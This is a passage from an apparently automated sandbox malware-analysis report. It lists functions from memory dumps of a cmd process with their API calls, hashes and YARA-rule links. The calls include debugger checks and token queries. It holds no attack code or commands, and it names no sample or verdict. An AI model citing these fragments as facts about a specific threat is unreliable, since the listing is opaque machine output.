                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1617791916-0
                                                                                        • Opcode ID: 8dc15d420ed7e2e9edefbd98bdec47ad6f356231bcda807a2d73dc3165890db6
                                                                                        • Instruction ID: 6ae6a8e9852e582ebbce801b6dacdd43225fe02c6b1f51fe472a8c20eda0e0aa
                                                                                        • Opcode Fuzzy Hash: 8dc15d420ed7e2e9edefbd98bdec47ad6f356231bcda807a2d73dc3165890db6
                                                                                        • Instruction Fuzzy Hash: 5FE06D725013209BD7406BA8BD49B813BA9EB80312F058056FA0DD7354DBB4D842CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D764CA Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryInformationToken.NTDLL ref: 00D764E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQueryToken
                                                                                        • String ID:
                                                                                        • API String ID: 4239771691-0
                                                                                        • Opcode ID: df0fe10b13ff5003c0b70bcad6c987a40d1d6ac1bae987b821b64cc1201fec0e
                                                                                        • Instruction ID: 95e4d82c816f8789b9e2054d0c759c61293a22231d63703c2f68b1bb829871ee
                                                                                        • Opcode Fuzzy Hash: df0fe10b13ff5003c0b70bcad6c987a40d1d6ac1bae987b821b64cc1201fec0e
                                                                                        • Instruction Fuzzy Hash: 8FE092B2610208BFEB188F54DC46EEE7BACEB80710F14816DB54692140E3B09A40D670
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D82E37 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00D82FDD), ref: 00D82E5D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 1347740429-0
                                                                                        • Opcode ID: ece7c8e5f9a068e8ea4a1d2947ae64f9f2727c9014d375d85a5b936b66e06c86
                                                                                        • Instruction ID: e77786559627ae172eccef797b2f54d8525584d00c15ee6e736297180cd6a584
                                                                                        • Opcode Fuzzy Hash: ece7c8e5f9a068e8ea4a1d2947ae64f9f2727c9014d375d85a5b936b66e06c86
                                                                                        • Instruction Fuzzy Hash: 5DE08C306453219BD7222B685C993BB378C0B16B40B080465B495CB251C7849C04C7B8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8A135 Relevance: 1.5, APIs: 1, Instructions: 19filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtSetInformationFile.NTDLL(000000FF,?,?,00000001,0000000D), ref: 00D8A14E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformation
                                                                                        • String ID:
                                                                                        • API String ID: 4253254148-0
                                                                                        • Opcode ID: 801b3795974b0f9a88207087995b0873d1b114d2e7de30466ce7f9eacc0bed76
                                                                                        • Instruction ID: 323d1e672f799f6f688754e29b494d3864f31d394e34c1e17b6c4a6e30dc5faa
                                                                                        • Opcode Fuzzy Hash: 801b3795974b0f9a88207087995b0873d1b114d2e7de30466ce7f9eacc0bed76
                                                                                        • Instruction Fuzzy Hash: 66D05E756043097BDB1593A89C4AFCB7BAC9B44304F400165B512E21C0DAF1D509C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D76EC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00016E70), ref: 00D76EC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 8a573512432477c1ca2c262e9c0c2272d4672b41e4acdc39cae62620625cb8d4
                                                                                        • Instruction ID: 02545648cd5d16f5323e40aaf795f8b76d545ce9f521647671f01eef9e6698b0
                                                                                        • Opcode Fuzzy Hash: 8a573512432477c1ca2c262e9c0c2272d4672b41e4acdc39cae62620625cb8d4
                                                                                        • Instruction Fuzzy Hash: C29002A52916008A960157759C0940576B15A4D602742C550F045C9158FB648008953A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AF02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #%u
                                                                                        • API String ID: 0-232158463
                                                                                        • Opcode ID: e15cbfcd03dce5c8f5afb8f0317e9e28ec554c38322d5b36a952c7165d903b89
                                                                                        • Instruction ID: ee2acf7433073529d85df22e7a7a92d53565184c6c3c5383a1e595dd01b94427
                                                                                        • Opcode Fuzzy Hash: e15cbfcd03dce5c8f5afb8f0317e9e28ec554c38322d5b36a952c7165d903b89
                                                                                        • Instruction Fuzzy Hash: 16716D75A00249DFDB11DF99C984BAEB7F8FF08708F1441A6E905EB251E734E915CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B141BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                        • Instruction ID: 87756edbab7481b125f3458f8d137d5ff5e42d0e0440b7e51ab8a5ad2d4f9690
                                                                                        • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                        • Instruction Fuzzy Hash: 01519A75601710AFC320DF59C840A6BBBF8FF48714F008A6AFA959B6A0E774E914CBD1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B5C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryHash
                                                                                        • API String ID: 0-2202222882
                                                                                        • Opcode ID: 6aa995a3f0a5fd7509811129afdb90ea930290ea17be8520deef99e64f497e2d
                                                                                        • Instruction ID: a7b8a8445be31701ea40897289677ecb583264a124458a26d0edf860eb48e927
                                                                                        • Opcode Fuzzy Hash: 6aa995a3f0a5fd7509811129afdb90ea930290ea17be8520deef99e64f497e2d
                                                                                        • Instruction Fuzzy Hash: 8D4123F590022D9BDF21DA50DC85FDEBB7DAB44718F0045F5BA09AB140DB709E888FA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B3717A Relevance: .7, Instructions: 705COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e24f45574864520be1e3e6e74eaf438f7831581447ce6cc9b05558fe37d2576
                                                                                        • Instruction ID: 7eb73be2d0c5e9774957719f71515a36d836412436dd8ac724c8a6f148a9e9ab
                                                                                        • Opcode Fuzzy Hash: 5e24f45574864520be1e3e6e74eaf438f7831581447ce6cc9b05558fe37d2576
                                                                                        • Instruction Fuzzy Hash: A242C6B5A006259FCB14CF59C8916ADF7B6FF8A318F1885EDD452AB340DB34E842CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B0B1E0 Relevance: .6, Instructions: 629COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a14547d206a87d596f5366f3ee9a808521c3ace67458c5224264beb43da9c12f
                                                                                        • Instruction ID: a496ef812c57f25354ddc7dfca071edc2ee9142ff04ff572adac171f4fc13b88
                                                                                        • Opcode Fuzzy Hash: a14547d206a87d596f5366f3ee9a808521c3ace67458c5224264beb43da9c12f
                                                                                        • Instruction Fuzzy Hash: 4D326D75E002199BCF14DFA8D890BAEBBB5FF84718F1801B9E805AB390E775D911CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BA124C Relevance: .6, Instructions: 571COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 51937b51cef4d791c0aef06e5ec1abb29d308790132cd8fa70c8c62bf857f6db
                                                                                        • Instruction ID: 29736ff909ba792cb1cc85f1555fa8252b145a932cb3b64ae22da9cdbb7c721f
                                                                                        • Opcode Fuzzy Hash: 51937b51cef4d791c0aef06e5ec1abb29d308790132cd8fa70c8c62bf857f6db
                                                                                        • Instruction Fuzzy Hash: 46229035A04A168FCB59CF5CC490AAAF7B6FF88318F1885B9D855DB384DB34E941CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AD8347 Relevance: .4, Instructions: 380COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ca82b135b1f89aa6b022a400fed5b0a97b594e2157feac5122918a5b3caa2e58
                                                                                        • Instruction ID: 8f135777d671bf402d524c04adbdf7e2428bfce4bc0cac2e8312c8bf30c98027
                                                                                        • Opcode Fuzzy Hash: ca82b135b1f89aa6b022a400fed5b0a97b594e2157feac5122918a5b3caa2e58
                                                                                        • Instruction Fuzzy Hash: 0DD1D875A0032A9BCB14DF64C880BBEB7B9FF45718F08416EE816DB284EB38E945C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AED700 Relevance: .3, Instructions: 342COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f99afaa3a5ad2ffb4897e9b63cfe1ae998cd6ccf8bfee137c3232421fe7d464
                                                                                        • Instruction ID: ef27731605cbbb206e03c63817deb856646052f1ef1649b8951b9190816d0880
                                                                                        • Opcode Fuzzy Hash: 7f99afaa3a5ad2ffb4897e9b63cfe1ae998cd6ccf8bfee137c3232421fe7d464
                                                                                        • Instruction Fuzzy Hash: B3C19275A003159FDB28CB59C840BAEF7B5EF44318F1C82AEE819AB280D775E951CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AFF380 Relevance: .3, Instructions: 321COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66b85d09176262a0fc504a13fddfdb63f8e1c17a2b2aae86a66345163e6b80f8
                                                                                        • Instruction ID: c54b6ce560a2b788150b28967527aa7e70538a30fba7b14c0b637a9dc747ac75
                                                                                        • Opcode Fuzzy Hash: 66b85d09176262a0fc504a13fddfdb63f8e1c17a2b2aae86a66345163e6b80f8
                                                                                        • Instruction Fuzzy Hash: 3AC12371A056248FCB28CF98C5907B9B7B5FF88708F1941ABFA429F395E7748A41C760
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE37E4 Relevance: .3, Instructions: 303COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15d19c595fe5715f090153ba1e1e39b6c2e36eb23dac81811e6701f730e3039f
                                                                                        • Instruction ID: 4eba9550e39c18c98786035b47703b81d691ec1bb4dd3393537a297d49c706c6
                                                                                        • Opcode Fuzzy Hash: 15d19c595fe5715f090153ba1e1e39b6c2e36eb23dac81811e6701f730e3039f
                                                                                        • Instruction Fuzzy Hash: A5C154B9D013099FCB15DFA9D950BAEBBF4FB48704F14446AE51AAB390E734A901CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE82E0 Relevance: .3, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 24c52f3b0829dc8f417ba1ff055bb73d4844851089c97ce89adc4e60f4586dbd
                                                                                        • Instruction ID: 2d4b446aed9e44b40cc083cc665bfc4bf89011fe24770eddfaed4e5301db22fe
                                                                                        • Opcode Fuzzy Hash: 24c52f3b0829dc8f417ba1ff055bb73d4844851089c97ce89adc4e60f4586dbd
                                                                                        • Instruction Fuzzy Hash: DFC169756083408FD760CF18C494BABB7E8FF88708F4449AEE5998B291D778E944CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADC3C7 Relevance: .3, Instructions: 280COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d45625029a05a5c93e333ab702550644152472c21bf51b2ef7cc477374ec8f97
                                                                                        • Instruction ID: 4374d64e9591786768f42f66cd1c0e1aac9f5167571b887756d54c17dd108684
                                                                                        • Opcode Fuzzy Hash: d45625029a05a5c93e333ab702550644152472c21bf51b2ef7cc477374ec8f97
                                                                                        • Instruction Fuzzy Hash: 1CB18074A002658BDB34DF65C990BA9B3F5EF44714F4485EAD50BEB280EB709E85CF20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B200A5 Relevance: .3, Instructions: 276COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b41cdca54254fd6a710345f49348e300aac63948bc6db27f8686d86b3b8964a1
                                                                                        • Instruction ID: c8cc6356044ab7c65e05571ab1be62f5dd1d3079243975c130caf3d82ed66fdd
                                                                                        • Opcode Fuzzy Hash: b41cdca54254fd6a710345f49348e300aac63948bc6db27f8686d86b3b8964a1
                                                                                        • Instruction Fuzzy Hash: 5BA1D574B01726DFDB24EF65C590BAABBB5FF44318F0442B9E909DB281DB34A911CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BB4080 Relevance: .3, Instructions: 275COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 84b44c2b1cb1f0f4e092574abf744428cf1f76b27d213865cfee29371eb61f79
                                                                                        • Instruction ID: a88500291f0ced510d1ca4e74d5dc0aedd9c55b0c1e96eef31ef24bed76504bd
                                                                                        • Opcode Fuzzy Hash: 84b44c2b1cb1f0f4e092574abf744428cf1f76b27d213865cfee29371eb61f79
                                                                                        • Instruction Fuzzy Hash: FCA1EF72A04601AFC711DF55CA80BAAB7F8FF48308F4809B9F5859B752DBB4E911CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AFE310 Relevance: .3, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c230f782d9f02e33043171b9beffcc937c338a6a62041e53c09d7680fc7caf63
                                                                                        • Instruction ID: 8aff7145684ef73de2872e87bb5449f981e7c092027d3432ec42e09f1fd06244
                                                                                        • Opcode Fuzzy Hash: c230f782d9f02e33043171b9beffcc937c338a6a62041e53c09d7680fc7caf63
                                                                                        • Instruction Fuzzy Hash: 2B911339A00A149FDB20DFA8C584F7EB7B1EF94759F0941BAFA059B3A0E7349901C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE93A6 Relevance: .3, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3031a114bd1dca20ec937c95993bfebf8369c5f4b03c565135041f50bdda8769
                                                                                        • Instruction ID: 4b34449d2944730ff0a89ce41096905a2d28c98d2a513117035ec2e6d867d710
                                                                                        • Opcode Fuzzy Hash: 3031a114bd1dca20ec937c95993bfebf8369c5f4b03c565135041f50bdda8769
                                                                                        • Instruction Fuzzy Hash: 97B17E75900306CFCB24DF19D5907AAB7B4FB18318F1849AFD8299F2A5DB39D842CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE1051 Relevance: .3, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f44f407158f1268f6274a48997c2880f9b7d2c0ab3e07c7dccd39ecda937ba8e
                                                                                        • Instruction ID: 3c0eb0427842d44bf43f2660020a9f822f78f35021afdb60a482bfb2fdf9d1f3
                                                                                        • Opcode Fuzzy Hash: f44f407158f1268f6274a48997c2880f9b7d2c0ab3e07c7dccd39ecda937ba8e
                                                                                        • Instruction Fuzzy Hash: BDB10175A093909FD754CF28C580A6AFBF1FB89308F1849AEF8998B351D371E945CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE7290 Relevance: .2, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
